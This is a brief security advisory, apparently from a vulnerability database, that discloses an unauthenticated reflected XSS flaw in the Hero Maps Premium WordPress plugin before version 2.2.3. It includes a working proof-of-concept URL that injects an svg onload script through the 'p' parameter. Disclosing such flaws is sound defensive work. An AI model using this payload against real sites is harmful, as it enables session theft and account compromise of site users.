Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The hmapsprem WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.

PoC

http://example.com/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo"><svg//onload="alert('XSS in Hero Maps Premium 2.1.6')">